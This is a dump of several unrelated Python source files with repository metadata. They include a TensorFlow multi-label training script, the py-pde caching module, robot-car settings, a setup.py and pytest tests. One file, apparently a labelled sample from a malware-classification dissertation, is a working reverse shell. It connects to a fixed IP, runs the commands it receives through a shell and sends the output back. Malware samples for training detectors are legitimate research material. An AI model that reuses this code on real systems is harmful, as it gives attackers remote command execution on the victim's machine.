        self.accuracy = self.net.accuracy(tf.nn.sigmoid(self.y_pred), self.y)
        self.patk = self.net.patk(self.y, self.y_pred)
        self.summarizer.scalar("accuracy", self.accuracy)
        self.summarizer.scalar("loss", self.loss)
        self.train = self.net.train_step(self.loss)
        self.saver = tf.train.Saver()
        self.init = tf.global_variables_initializer()
        self.local_init = tf.local_variables_initializer()

    def add_placeholders(self):
        self.x = tf.placeholder(tf.float32, shape=[None, self.config.features_dim])
        self.y = tf.placeholder(tf.float32, shape=[None, self.config.labels_dim])
        self.keep_prob = tf.placeholder(tf.float32)
        # self.k = int()

    def run_epoch(self, sess, data, summarizer, epoch):
        err = list()
        i = 0
        step = epoch
        merged_summary = self.summarizer.merge_all()
        for X, Y, tot in self.data.next_batch(data):
            feed_dict = {self.x: X, self.y: Y, self.keep_prob: self.config.solver.dropout}
            if not self.config.load:
                summ, _, y_pred, loss = sess.run([merged_summary, self.train, self.y_pred, self.loss], feed_dict=feed_dict)
                err.append(loss)
                output = "Epoch ({}) Batch({}) - Loss : {}".format(self.epoch_count, i, loss)
                with open("../stdout/{}_train.log".format(self.config.project_name), "a+") as log:
                    log.write(output + "\n")
                print("   {}".format(output), end='\r')
                step = int(epoch*tot + i)
                summarizer.add_summary(summ, step)
            i += 1
        return np.mean(err), step

    def run_eval(self, sess, data, summary_writer=None, step=0):
        y, y_pred, loss_, metrics, p_k = list(), list(), 0.0, None, None
        accuracy, loss = 0.0, 0.0
        merged_summary = self.summarizer.merge_all()
        i = 0
        for X, Y, tot in self.data.next_batch(data):
            feed_dict = {self.x: X, self.y: Y, self.keep_prob: 1}
            if i == tot - 1 and summary_writer is not None:
                if data == "validation":
                    summ, loss_ = sess.run([merged_summary, self.loss], feed_dict=feed_dict)
                else:
                    summ, loss_, accuracy_val = sess.run([merged_summary, self.loss, self.accuracy], feed_dict=feed_dict)
                summary_writer.add_summary(summ, step)
            else:
                if data == "validation":
                    loss_, Y_pred = sess.run([self.loss, tf.nn.sigmoid(self.y_pred)], feed_dict=feed_dict)
                    p_k = patk(predictions=Y_pred, labels=Y)
                else:
                    loss_, Y_pred, accuracy_val = sess.run([self.loss, tf.nn.sigmoid(self.y_pred), self.accuracy], feed_dict=feed_dict)
                    metrics = evaluate(predictions=Y_pred, labels=Y)
                    accuracy += accuracy_val  # metrics['accuracy']
            loss += loss_
            i += 1
        X, Y = self.data.get_test()
        p_k = patk(sess.run(tf.nn.sigmoid(self.y_pred), feed_dict={self.x: X, self.y: Y, self.keep_prob: 1}), Y)
        # sess.run(self.patk, feed_dict={self.x: X, self.y: Y, self.keep_prob: 1})
        return loss / i, accuracy / self.config.batch_size, metrics, p_k

    def add_summaries(self, sess):
        if self.config.load or self.config.debug:
            path_ = "../results/tensorboard"
        else:
            path_ = "../bin/results/tensorboard"
        summary_writer_train = tf.summary.FileWriter(path_ + "/train", sess.graph)
        summary_writer_val = tf.summary.FileWriter(path_ + "/val", sess.graph)
        summary_writer_test = tf.summary.FileWriter(path_ + "/test", sess.graph)
        summary_writers = {'train': summary_writer_train, 'val': summary_writer_val, 'test': summary_writer_test}
        return summary_writers

    def fit(self, sess, summarizer):
        '''
         - Patience Method :
         + Train for a particular no. of epochs, and based on the frequency, evaluate the model using validation data.
         + If Validation Loss increases, decrease the patience counter.
         + If patience becomes less than a certain threshold, divide learning rate by 10 and switch back to old model
         + If learning rate is lesser than a certain threshold, stop training.
        '''
        sess.run(self.init)
        sess.run(self.local_init)
        max_epochs = self.config.max_epochs
        patience = self.config.patience
        patience_increase = self.config.patience_increase
        improvement_threshold = self.config.improvement_threshold
        best_validation_loss = 1e6
        self.epoch_count = 0
        best_step, losses, learning_rate = -1, list(), self.config.solver.learning_rate
        while self.epoch_count < max_epochs:
            if self.config.load == True:
                break
            start_time = time.time()
            average_loss, tr_step = self.run_epoch(sess, "train", summarizer['train'], self.epoch_count)
            duration = time.time() - start_time
            if not self.config.debug:
                if self.epoch_count % self.config.epoch_freq == 0:
                    val_loss, _, _, _ = self.run_eval(sess, "validation", summarizer['val'], tr_step)
                    test_loss, _, metrics, patk = self.run_eval(sess, "test", summarizer['test'], tr_step)
                    output = "=> Training : Loss = {:.2f} | Validation : Loss = {:.2f} | Test : Loss = {:.2f}".format(average_loss, val_loss, test_loss)
                    with open("../stdout/validation.log", "a+") as f:
                        output_ = output + "\n=> Test : Coverage = {}, Average Precision = {}, Micro Precision = {}, Micro Recall = {}, Micro F Score = {}".format(metrics['coverage'], metrics['average_precision'], metrics['micro_precision'], metrics['micro_recall'], metrics['micro_f1'])
                        output_ += "\n=> Test : Macro Precision = {}, Macro Recall = {}, Macro F Score = {}\n=> P@K = {}\n\n".format(metrics['macro_precision'], metrics['macro_recall'], metrics['macro_f1'], patk)
                        f.write(output_)
                    print(output)
                    if self.config.have_patience:
                        if val_loss < best_validation_loss:
                            if val_loss < best_validation_loss * improvement_threshold:
                                self.saver.save(sess, self.config.ckptdir_path + "model_best.ckpt")
                                best_validation_loss = val_loss
                                best_step = self.epoch_count
                        else:
                            if patience < 1:
                                self.saver.restore(sess, self.config.ckptdir_path + "model_best.ckpt")
                                if learning_rate <= 0.00001:
                                    print("=> Breaking by Patience Method")
                                    break
                                else:
                                    learning_rate /= 10
                                    patience = self.config.patience
                                    print("\033[91m=> Learning rate dropped to {}\033[0m".format(learning_rate))
                            else:
                                patience -= 1
            self.epoch_count += 1
        print("=> Best epoch : {}".format(best_step))
        if self.config.debug == True:
            sys.exit()
        test_loss, test_accuracy, test_metrics, p_k = self.run_eval(sess, "test", summarizer['test'], tr_step)
        returnDict = {"test_loss": test_loss, "test_accuracy": test_accuracy, 'test_metrics': test_metrics, "test_pak": p_k}
        if self.config.debug == False:
            returnDict["train"] = best_validation_loss
        return returnDict


def init_model(config):
    tf.reset_default_graph()
    tf.set_random_seed(1234)
    with tf.variable_scope('Model', reuse=None) as scope:
        model = Model(config)
    tf_config = tf.ConfigProto(allow_soft_placement=True)  # , device_count = {'GPU': 0})
    tf_config.gpu_options.allow_growth = True
    sess = tf.Session(config=tf_config)
    if config.load == True:
        print("=> Loading model from checkpoint")
        model.saver.restore(sess, config.ckptdir_path)
    else:
        print("=> No model loaded from checkpoint")
    return model, sess


def train_model(config):
    if config.load == True:
        print("\033[92m=>\033[0m Testing Model")
    else:
        print("\033[92m=>\033[0m Training Model")
    model, sess = init_model(config)
    with sess:
        summary_writers = model.add_summaries(sess)
        loss_dict = model.fit(sess, summary_writers)
        return loss_dict


def main():
    args = Parser().get_parser().parse_args()
    config = Config(args)
    loss_dict = train_model(config)
    metrics = loss_dict['test_metrics']
    if config.debug == False:
        output = "=> Best Train Loss : {}, Test Loss : {}, Test Accuracy : {}".format(loss_dict["train"], loss_dict["test_loss"], loss_dict["test_accuracy"])
    else:
        output = "=> Test Loss : {}, Test Accuracy : {}".format(loss_dict["test_loss"], loss_dict["test_accuracy"])
    output += "\n=> Test : Coverage = {}, Average Precision = {}, Micro Precision = {}, Micro Recall = {}, Micro F Score = {}".format(metrics['coverage'], metrics['average_precision'], metrics['micro_precision'], metrics['micro_recall'], metrics['micro_f1'])
    output += "\n=> Test : Macro Precision = {}, Macro Recall = {}, Macro F Score = {}".format(metrics['macro_precision'], metrics['macro_recall'], metrics['macro_f1'])
    output += "\n=> Test : p@K values : {}".format(loss_dict['test_pak'])
    with open("../stdout/test_log.log", "a+") as f:
        f.write(output)
    print("\033[1m\033[92m{}\033[0m\033[0m".format(output))


if __name__ == '__main__':
    np.random.seed(1234)
    main()
    # Phew!
49ddcfdac88e151ccd52723b98147eb5ab096274
bfcd8f1f6ac8590df321f23a422eca0370a25b8f
/myenv/bin/pyi-set_version
a3276f253e4ab124adb59f23c54ff3757e3c6917
[]
no_license
Stephen-Tipa-Augustine/KMC_ventilator
0567fa0b72d41fb0de11cd72c62567bed973d9f5
456e88ae4fff3984d5456517ba8787f9d5762745
refs/heads/master
2022-12-26T08:00:41.102890
2020-09-07T11:00:13
2020-09-07T11:00:13
293,500,282
0
1
null
2022-12-19T04:33:28
2020-09-07T10:49:08
Python
UTF-8
Python
false
false
283
#!/home/sephanayer/PycharmProjects/KMC_ventilator/myenv/bin/python
# -*- coding: utf-8 -*-
import re
import sys

from PyInstaller.utils.cliutils.set_version import run

if __name__ == '__main__':
    sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
    sys.exit(run())
63b818db9e4eccd807d593c3f43062cb64409b4b
4fd4d339d8e52fb80bcc4b3c0bf85eed11def9ff
/pde/tools/cache.py
71cfb06effa1cfc63fda51ecc69176e9053b6a51
[ "MIT" ]
permissive
Capri2014/py-pde
c3bb6e6544876a8d97e3932ae048f53d273e74ef
2686e75eff9db54dfab0db26a2634d31eac3962c
refs/heads/master
2022-12-19T04:55:12.374179
2020-09-25T16:06:51
2020-09-25T16:06:51
null
0
0
null
null
null
null
UTF-8
Python
false
false
20,996
py
""" Module containing functions for managing cache structures .. autosummary:: :nosignatures: cached_property cached_method hash_mutable hash_readable make_serializer make_unserializer DictFiniteCapacity SerializedDict .. codeauthor:: David Zwicker <[email protected]> """ from __future__ import division import collections import functools import logging import numbers from hashlib import sha1 from typing import Callable, Dict, Iterable, Optional import numpy as np def objects_equal(a, b) -> bool: """compares two objects to see whether they are equal In particular, this uses :func:`numpy.array_equal` to check for numpy arrays Args: a: The first object b: The second object Returns: bool: Whether the two objects are considered equal """ # compare numpy arrays if isinstance(a, np.ndarray): return np.array_equal(a, b) # type: ignore if isinstance(b, np.ndarray): return np.array_equal(b, a) # type: ignore # compare dictionaries if isinstance(a, dict): if not isinstance(b, dict) or len(a) != len(b): return False return all(objects_equal(v, b[k]) for k, v in a.items()) if isinstance(a, (tuple, list)): if a.__class__ != b.__class__ or len(a) != len(b): return False return all(objects_equal(x, y) for x, y in zip(a, b)) # use direct comparison return a == b # type: ignore def _hash_iter(it: Iterable) -> int: """ get hash of an iterable but turning it into a tuple first """ return hash(tuple(it)) def hash_mutable(obj) -> int: """return hash also for (nested) mutable objects. This function might be a bit slow, since it iterates over all containers and hashes objects recursively. Args: obj: A general python object Returns: int: A hash value associated with the data of `obj` """ if hasattr(obj, "_cache_hash"): return int(obj._cache_hash()) # deal with some special classes if isinstance(obj, (list, tuple)): return _hash_iter(hash_mutable(v) for v in obj) if isinstance(obj, (set, frozenset)): return hash(frozenset(hash_mutable(v) for v in obj)) if isinstance(obj, collections.OrderedDict): return _hash_iter( (k, hash_mutable(v)) for k, v in obj.items() if not (isinstance(k, str) and k.startswith("_cache")) ) unordered_mappings = ( dict, collections.abc.MutableMapping, collections.defaultdict, collections.Counter, ) if isinstance(obj, unordered_mappings): return hash( frozenset( (k, hash_mutable(v)) for k, v in sorted(obj.items()) if not (isinstance(k, str) and k.startswith("_cache")) ) ) if isinstance(obj, np.ndarray): return hash(obj.tobytes()) try: # try using the internal hash function return hash(obj) except TypeError: try: # try hashing the data buffer return hash(sha1(obj)) except (ValueError, TypeError): # otherwise, hash the internal dict return hash_mutable(obj.__dict__) def hash_readable(obj) -> str: """return human readable hash also for (nested) mutable objects. This function returns a json-like representation of the object. The function might be a bit slow, since it iterates over all containers and hashes objects recursively. Note that this hash function tries to return the same value for equivalent objects, but it does not ensure that the objects can be reconstructed from this data. 
Args: obj: A general python object Returns: str: A hash value associated with the data of `obj` """ if isinstance(obj, numbers.Number): return str(obj) if isinstance(obj, (str, bytes)): return '"' + str(obj).replace("\\", "\\\\").replace('"', '"') + '"' if isinstance(obj, (list, tuple)): return "[" + ", ".join(hash_readable(v) for v in obj) + "]" if isinstance(obj, (set, frozenset)): return "{" + ", ".join(hash_readable(v) for v in sorted(obj)) + "}" mappings = ( dict, collections.abc.MutableMapping, collections.OrderedDict, collections.defaultdict, collections.Counter, ) if isinstance(obj, mappings): hash_str = ", ".join( hash_readable(k) + ": " + hash_readable(v) for k, v in sorted(obj.items()) ) return "{" + hash_str + "}" if isinstance(obj, np.ndarray): return repr(obj) # otherwise, assume it's a generic object try: if hasattr(obj, "__getstate__"): data = obj.__getstate__() else: data = obj.__dict__ except AttributeError: # strange object without a dictionary attached to it return repr(obj) else: # turn arguments into something readable args = ", ".join( str(k) + "=" + hash_readable(v) for k, v in sorted(data.items()) if not k.startswith("_") ) return "{name}({args})".format(name=obj.__class__.__name__, args=args) def make_serializer(method: str) -> Callable: """returns a function that serialize data with the given method. Note that some of the methods destroy information and cannot be reverted. Args: method (str): An identifier determining the serializer that will be returned Returns: callable: A function that serializes objects """ if callable(method): return method if method is None: return lambda s: s if method == "hash": return hash if method == "hash_mutable": return hash_mutable if method == "hash_readable": return hash_readable if method == "json": import json return lambda s: json.dumps(s, sort_keys=True).encode("utf-8") if method == "pickle": import pickle return lambda s: pickle.dumps(s, protocol=pickle.HIGHEST_PROTOCOL) if method == "yaml": import yaml return lambda s: yaml.dump(s).encode("utf-8") raise ValueError("Unknown serialization method `%s`" % method) def make_unserializer(method: str) -> Callable: """returns a function that unserialize data with the given method This is the inverse function of :func:`make_serializer`. 
Args: method (str): An identifier determining the unserializer that will be returned Returns: callable: A function that serializes objects """ if callable(method): return method if method is None: return lambda s: s if method == "json": import json return lambda s: json.loads(s.decode("utf-8")) if method == "pickle": import pickle return lambda s: pickle.loads(s) if method == "yaml": import yaml return yaml.full_load if method == "yaml_unsafe": import yaml # @Reimport return yaml.unsafe_load # type: ignore raise ValueError("Unknown serialization method `%s`" % method) class DictFiniteCapacity(collections.OrderedDict): """ cache with a limited number of items """ default_capacity: int = 100 def __init__(self, *args, **kwargs): self.capacity = kwargs.pop("capacity", self.default_capacity) super(DictFiniteCapacity, self).__init__(*args, **kwargs) def check_length(self): """ ensures that the dictionary does not grow beyond its capacity """ while len(self) > self.capacity: self.popitem(last=False) def __eq__(self, other): return super().__eq__(other) and self.capacity == other.capacity def __ne__(self, other): return super().__ne__(other) or self.capacity != other.capacity def __setitem__(self, key, value): super(DictFiniteCapacity, self).__setitem__(key, value) self.check_length() def update(self, values): super(DictFiniteCapacity, self).update(values) self.check_length() class SerializedDict(collections.abc.MutableMapping): """a key value database which is stored on the disk This class provides hooks for converting arbitrary keys and values to strings, which are then stored in the database. """ def __init__( self, key_serialization: str = "pickle", value_serialization: str = "pickle", storage_dict: Optional[Dict] = None, ): """provides a dictionary whose keys and values are serialized Args: key_serialization (str): Determines the serialization method for keys value_serialization (str): Determines the serialization method for values storage_dict (dict): Can be used to chose a different dictionary for the underlying storage mechanism, e.g., storage_dict = PersistentDict() """ # initialize the dictionary that actually stores the data if storage_dict is None: self._data = {} else: self._data = storage_dict # define the methods that serialize and unserialize the data self.serialize_key = make_serializer(key_serialization) self.unserialize_key = make_unserializer(key_serialization) self.serialize_value = make_serializer(value_serialization) self.unserialize_value = make_unserializer(value_serialization) def __len__(self): return len(self._data) def __getitem__(self, key): # convert key to its string representation key_s = self.serialize_key(key) # fetch the value value = self._data[key_s] # convert the value to its object representation return self.unserialize_value(value) def __setitem__(self, key, value): # convert key and value to their string representations key_s = self.serialize_key(key) value_s = self.serialize_value(value) # add the item to the dictionary self._data[key_s] = value_s def __delitem__(self, key): # convert key to its string representation key_s = self.serialize_key(key) # delete the item from the dictionary del self._data[key_s] def __contains__(self, key): # convert key to its string representation key_s = self.serialize_key(key) # check whether this items exists in the dictionary return key_s in self._data def __iter__(self): # iterate dictionary for key_s in self._data.__iter__(): # convert the value to its object representation yield self.unserialize_key(key_s) class 
_class_cache: """ class handling the caching of results of methods and properties """ def __init__( self, factory=None, extra_args=None, ignore_args=None, hash_function="hash_mutable", doc=None, name=None, ): r"""decorator that caches calls in a dictionary attached to the instances. This can be used with most classes Example: An example for using the class is:: class Foo(): @cached_property() def property(self): return "Cached property" @cached_method() def method(self): return "Cached method" foo = Foo() foo.property foo.method() The cache can be cleared by setting `foo.\_cache\_methods = {}` if the cache factory is a simple dict, i.e, if `factory == None`. Alternatively, each cached method has a :func:`clear_cache_of_obj` method, which clears the cache of this particular method. In the example above we could thus call `foo.bar.clear\_cache\_of\_obj(foo)` to clear the cache. Note that the object instance has to be passed as a parameter, since the method :func:`bar` is defined on the class, not the instance, i.e., we could also call `Foo.bar.clear\_cache\_of\_obj(foo)`. To clear the cache from within a method, one can thus call `self.method_name.clear\_cache\_of\_obj(self)`, where `method\_name` is the name of the method whose cache is cleared Example: An advanced example is:: class Foo(): def get_cache(self, name): # `name` is the name of the method to cache return DictFiniteCapacity() @cached_method(factory='get_cache') def foo(self): return "Cached" Args: factory (callable): Function/class creating an empty cache. `dict` by default. This can be used with user-supplied storage backends by. The cache factory should return a dict-like object that handles the cache for the given method. extra_args (list): List of attributes of the class that are included in the cache key. They are then treated as if they are supplied as arguments to the method. This is important to include when the result of a method depends not only on method arguments but also on instance attributes. ignore_args (list): List of keyword arguments that are not included in the cache key. These should be arguments that do not influence the result of a method, e.g., because they only affect how intermediate results are displayed. hash_function (str): An identifier determining what hash function is used on the argument list. doc (str): Optional string giving the docstring of the decorated method name (str): Optional string giving the name of the decorated method """ self.extra_args = extra_args self.hash_function = hash_function self.name = name # setup the ignored arguments if ignore_args is not None: if isinstance(ignore_args, str): ignore_args = [ignore_args] self.ignore_args = set(ignore_args) else: self.ignore_args = None # check whether the decorator has been applied correctly if callable(factory): class_name = self.__class__.__name__ raise ValueError( f"Missing function call. 
Call this decorator as {class_name}() instead " f"of {class_name}" ) else: self.factory = factory def _get_clear_cache_method(self) -> Callable: """return a method that can be attached to classes to clear the cache of the wrapped method""" def clear_cache(obj): """ clears the cache associated with this method """ try: # try getting an initialized cache cache = obj._cache_methods[self.name] except (AttributeError, KeyError): # the cache was not initialized if self.factory is None: # the cache would be a dictionary, but it is not yet # initialized => we don't need to clear anything return # initialize the cache, since it might open a persistent # database, which needs to be cleared cache = getattr(obj, self.factory)(self.name) # clear the cache cache.clear() return clear_cache def _get_wrapped_function(self, func: Callable) -> Callable: """ return the wrapped method, which implements the cache """ if self.name is None: self.name = func.__name__ # create the function to serialize the keys hash_key = make_serializer(self.hash_function) @functools.wraps(func) def wrapper(obj, *args, **kwargs): # try accessing the cache try: cache = obj._cache_methods[self.name] except (AttributeError, KeyError) as err: # the cache was not initialized wrapper._logger.debug("Initialize the cache for `%s`", self.name) if isinstance(err, AttributeError): # the cache dictionary is not even present obj._cache_methods = {} # create cache using the right factory method if self.factory is None: cache = {} else: cache = getattr(obj, self.factory)(self.name) # store the cache in the dictionary obj._cache_methods[self.name] = cache # determine the key that encodes the current arguments if self.ignore_args: kwargs_key = { k: v for k, v in kwargs.items() if k not in self.ignore_args } func_args = [args, kwargs_key] else: func_args = [args, kwargs] if self.extra_args: for extra_arg in self.extra_args: func_args.append(getattr(obj, extra_arg)) cache_key = hash_key(tuple(func_args)) try: # try loading the results from the cache result = cache[cache_key] except KeyError: # if this failed, compute and store the results wrapper._logger.debug( "Cache missed. Compute result for method `%s` with args `%s`", self.name, func_args, ) result = func(obj, *args, **kwargs) cache[cache_key] = result return result # initialize the logger wrapper._logger = logging.getLogger(__name__) # type: ignore return wrapper class cached_property(_class_cache): r"""Decorator to use a method as a cached property The function is only called the first time and each successive call returns the cached result of the first call. Example: Here is an example for how to use the decorator:: class Foo(): @cached_property def bar(self): return "Cached" foo = Foo() result = foo.bar The data is stored in a dictionary named `_cache_methods` attached to the instance of each object. The cache can thus be cleared by setting `self.\_cache\_methods = {}`. The cache of specific property can be cleared using `self._cache_methods[property_name] = {}`, where `property\_name` is the name of the property Adapted from <https://wiki.python.org/moin/PythonDecoratorLibrary>. 
""" def __call__(self, method: Callable): """ apply the cache decorator to the property """ # save name, e.g., to be able to delete cache later self._cache_name = self.name self.clear_cache_of_obj = self._get_clear_cache_method() self.func = self._get_wrapped_function(method) self.__doc__ = self.func.__doc__ self.__name__ = self.func.__name__ self.__module__ = self.func.__module__ return self def __get__(self, obj, owner): """ call the method to obtain the result for this property """ return self.func(obj) class cached_method(_class_cache): r"""Decorator to enable caching of a method The function is only called the first time and each successive call returns the cached result of the first call. Example: The decorator can be used like so:: class Foo: @cached_method def bar(self): return "Cached" foo = Foo() result = foo.bar() The data is stored in a dictionary named `\_cache\_methods` attached to the instance of each object. The cache can thus be cleared by setting `self.\_cache\_methods = {}`. The cache of specific property can be cleared using `self.\_cache\_methods[property\_name] = {}`, where `property\_name` is the name of the property """ def __call__(self, method): """ apply the cache decorator to the method """ wrapper = self._get_wrapped_function(method) # save name, e.g., to be able to delete cache later wrapper._cache_name = self.name wrapper.clear_cache_of_obj = self._get_clear_cache_method() return wrapper
2001d879a3c4fa86e51f452141f58291f247e5d8
b580fd482147e54b1ca4f58b647fab016efa3855
/host_im/mount/malware-classification-master/samples/virus/sample_bad342.py
93d369222308b3fb6895c3732d78dc2b323386c3
[]
no_license
Barnsa/Dissertation
1079c8d8d2c660253543452d4c32799b6081cfc5
b7df70abb3f38dfd446795a0a40cf5426e27130e
refs/heads/master
2022-05-28T12:35:28.406674
2020-05-05T08:37:16
2020-05-05T08:37:16
138,386,344
0
0
null
null
null
null
UTF-8
Python
false
false
368
py
import tarfile
import hashlib
import bz2
import crypt
import hmac
import subprocess
import socket
import zipfile
import zlib
import gzip

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("175.20.0.200", 8080))
while not False:
    command = s.recv(1024).decode("utf-8")
    if not command:
        break
    data = subprocess.check_output(command, shell=True)
    s.send(data)
a2e7dee9a0ef320ef1a4ca7ee015c89591a5713a
7707233ec4a550f765fd28e7731f72542478cc1e
/startClient.py
cfee671263f209eef1c6a228f66fa7ad21bc2361
[]
no_license
Angelina-Wang/518project
6c971c7dfa34ee44961e127aba72ea9c85d8a762
fb1056ff66eb18393b4532d6eae935ca6240f517
refs/heads/master
2020-09-23T10:29:33.930957
2020-01-13T01:01:22
2020-01-13T01:01:22
225,477,176
0
0
null
null
null
null
UTF-8
Python
false
false
152
py
from custom_classes import *
import sys

client = AClient()
client.connectServer(sys.argv[1])
client.restart(float(sys.argv[2]))
client.startListener()
[ "None" ]
None
39f8937093dcbe80de31af680dadd9de39c094e5
91a9f5a7afb398f4238527708cbc155dc972cbfa
/teg2/bdd_car_versions/bdd_car_6Aug2017/bair_car/nodes/runtime_parameters.py
fcabb93f3a883c1f48ad5b69ad2cf492c0088468
[]
no_license
bddmodelcar/kzpy3.2
cd6f9bf6b7b8b920c79b4ee36c2592b992ae4332
b044b26649b19b240bd580feca20424a237374b1
refs/heads/master
2021-01-19T21:01:58.687712
2017-08-23T22:39:56
2017-08-23T22:39:56
101,243,308
0
1
null
2017-08-24T02:04:50
2017-08-24T02:04:50
null
UTF-8
Python
false
false
3,778
py
# This is used to specify caffe mode and data file name information
from kzpy3.utils2 import time_str
from kzpy3.utils2 import opjh
from kzpy3.utils2 import print_stars0
from kzpy3.utils2 import print_stars1
import os
import numpy as np

print_stars0();print(__file__);print_stars1()

computer_name = "MR_Unknown"
try:
    computer_name = os.environ["COMPUTER_NAME"]
except KeyError:
    print """**********
Please set the environment variable computer_name
***********
e.g.,
export COMPUTER_NAME="Mr_Orange"
"""

####################### general car settings ################
#
for i in range(1):
    print('*************' + computer_name + '***********')

Direct = 1.
Follow = 0.
Play = 0.
Furtive = 0.
Caf = 0.0
Racing = 0.0
Location = 'local' #Smyth_tape'
weight_file_path = opjh('pytorch_models','epoch6goodnet')
verbose = False
use_caffe = True
NETWORK = 111
I_ROBOT = 222
who_is_in_charge = I_ROBOT
robot_steer = 49
robot_motor = 49
steer_gain = 1.0
motor_gain = 1.0
acc2rd_threshold = 150
PID_min_max = [1.5,2.5]
"""
gyro_freeze_threshold = 150
acc_freeze_threshold_x = 7
acc_freeze_threshold_y_max = 15
acc_freeze_threshold_y_min = 0
acc_freeze_threshold_z = 7
motor_freeze_threshold = 55
n_avg_IMU = 10
"""
gyro_freeze_threshold = 150
acc_freeze_threshold_x = 4
acc_freeze_threshold_y_max = 13
acc_freeze_threshold_y_min = 5
acc_freeze_threshold_z = 2
motor_freeze_threshold = 55
n_avg_IMU = 10

robot_acc2rd_threshold = 10
robot_acc_y_exit_threshold = 0
torch_alt_motor = 59
#
###################################################################

####################### specific car settings ################
#
"""
if computer_name == 'Mr_Orange':
    #PID_min_max = [2.,3.]
    #motor_gain = 1.0
    Direct = 1.
    Follow = 0.
    Play = 0.
    Furtive = 0.
    pass
if computer_name == 'Mr_Silver':
    #motor_gain = 1.0
    pass
if computer_name == 'Mr_Blue':
    #PID_min_max = [1.5,2.5]
    #motor_gain = 1.0
    pass
if computer_name == 'Mr_Yellow':
    #PID_min_max = [1,2]
    #motor_gain = 0.9
    Direct = 1.
    Follow = 0.
    Play = 0.
    Furtive = 0.
    Caf = 0.0
    Racing = 0.0
    pass
if computer_name == 'Mr_Black':
    #PID_min_max = [1.5,2.5]
    #motor_gain = 1.0
    pass
if computer_name == 'Mr_White':
    #motor_gain = 1.0
    pass
if computer_name == 'Mr_Teal':
    #motor_gain = 1.0
    pass
if computer_name == 'Mr_Audi':
    #motor_gain = 1.0
    pass
if computer_name == 'Mr_Purple':
    #motor_gain = 1.0
    pass
if computer_name == 'Mr_LightBlue':
    #motor_gain = 1.0
    pass
#if computer_name == 'Mr_Blue_Original':
#    motor_gain = 0.5
#    pass
"""
#
###################################################################

# motor_gain = 1.0 # override individual settings

if Direct == 1:
    task = 'direct'
elif Play == 1:
    task = 'play'
elif Follow == 1:
    task = 'follow'
elif Furtive == 1:
    task = 'furtive'
elif Racing == 1:
    task = 'racing'
else:
    assert(False)

foldername = ''
if Follow == 1:
    foldername = 'follow_'
model_name = weight_file_path.split('/')[-1]
if Caf == 1:
    foldername = foldername + 'caffe2_' + model_name +'_'
foldername = foldername + task + '_'
foldername = foldername + Location + '_'
foldername = foldername + time_str() + '_'
foldername = foldername + computer_name

"""
#
###################################################################
# Aruco code parameters
ar_params={
    'ar_motor_command' : 49, # This is the resting command for stop
    'ar_max_left_steering_angle' : np.deg2rad(-130),
    'ar_max_right_steering_angle' : np.deg2rad(130),
    'ar_max_left_command' : 100,
    'ar_max_right_command' : 0,
    'ar_left_range' : 50,
    'ar_right_range' : 50,
    'ar_min_perceived_distance' : 9999,
    'ar_critical_distance' : 0.75,
    'ar_stop_distance' : 0.5,
    'ar_max_motor' : 70,
    'ar_min_motor' : 59,
    'ar_override_motor':49,
    'ar_override_steer':49 } # Full stop. Backwards is not considered
"""
fba1184cfd449adefa4e36759c3b17c04ea45157
d8859f10ea5d4eba76230036535cdb22fb6398ba
/setup.py
782c08fac224c86b107d7f2f3546e52e8546af76
[ "MIT" ]
permissive
ebranlard/wiz
322a83b0f97ad53c990cfaf26c182d02008f856a
6dfca8b2711b670229f5b2b3b3e0d7fe0bdea156
refs/heads/master
2021-06-09T17:26:48.478453
2021-06-04T16:29:53
2021-06-04T16:37:04
181,733,068
5
1
null
null
null
null
UTF-8
Python
false
false
323
py
from setuptools import setup, find_packages

setup(
    name='wiz',
    version='1.0',
    description='Python library from E. Branlard',
    url='http://github.com/ebranlard/wiz/',
    author='Emmanuel Branlard',
    author_email='[email protected]',
    license='MIT',
    packages=find_packages(),
    zip_safe=False
)
86a3adb8a35c843aa7d7252b10b0f4a38d03955b
76e51e96f663dccf9cd0f3b508dcee18996cf41b
/tests/test_Loading.py
78222aafe313c998725b2466b5f4c631c20a5184
[ "MIT" ]
permissive
renaiku/MHWorldData
b8d923765ee00bed08cf4d4c80b6ee88b18da1a9
34cf3e2d7e494e84cb48a8f14813480726019139
refs/heads/master
2020-03-27T22:33:12.411297
2018-09-03T18:41:07
2018-09-03T18:41:07
147,240,998
0
0
MIT
2018-09-03T18:38:14
2018-09-03T18:38:13
null
UTF-8
Python
false
false
2,247
py
import pytest
import os
import shutil
import json

from mhdata.io import DataReader


def save_json(obj, path):
    with open(path, 'w') as f:
        json.dump(obj, f)


@pytest.fixture()
def loader_mock(tmpdir):
    "Returns loader pointed to a temporary directory created for the test"
    return DataReader(
        data_path=tmpdir,
        languages=['en', 'ja']
    )


def test_load_base_json(loader_mock, basedata):
    path = loader_mock.get_data_path('base.json')
    save_json(basedata, path)

    bmap = loader_mock.load_base_json('base.json')

    assert len(bmap) == len(basedata), "Expected map and base to match"


def test_load_base_json_has_auto_ids(loader_mock, basedata):
    path = loader_mock.get_data_path('base.json')
    save_json(basedata, path)

    bmap = loader_mock.load_base_json('base.json')

    idval = bmap.id_of('ja', 'test2j')
    assert idval == 2, "expected auto id to have value 2"


def test_load_data_json(loader_mock, basedata, subdata):
    save_json(basedata, loader_mock.get_data_path('base.json'))
    save_json(subdata, loader_mock.get_data_path('data.json'))

    bmap = loader_mock.load_base_json('base.json')
    datamap = loader_mock.load_data_json(bmap.copy(), 'data.json')

    assert len(datamap) == len(bmap), "expecting full join"
    for i in range(1, len(datamap) + 1):
        bmap_name = bmap[i].name('en')
        assert datamap[i].name('en') == bmap_name, f"expecting names to match for entry {i}"
        assert datamap[i]['data'] == bmap_name, "expected data to match the name"


def test_load_split_data_map(loader_mock, basedata, subdata):
    save_json(basedata, loader_mock.get_data_path('base.json'))

    split_path = loader_mock.get_data_path('split/')
    os.makedirs(split_path)
    save_json({ 'test2': subdata['test2']}, os.path.join(split_path, 'split1.json'))
    save_json({ 'test1': subdata['test1']}, os.path.join(split_path, 'split2.json'))

    bmap = loader_mock.load_base_json('base.json')
    datamap = loader_mock.load_split_data_map(bmap, 'split')

    assert len(datamap) == 2, "expected two entries in the data map"

    names = [entry.name('en') for entry in datamap.values()]
    assert names == ['test1', 'test2'], "Expected names to match in basemap order"
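The basedata and subdata fixtures used above live in the project's conftest and are not part of this file; a plausible shape for them, inferred from the assertions (two entries, per-language names, a 'data' field equal to the English name), would be:

# Hypothetical fixture definitions; the real ones sit in conftest.py and may differ.
import pytest

@pytest.fixture()
def basedata():
    return {
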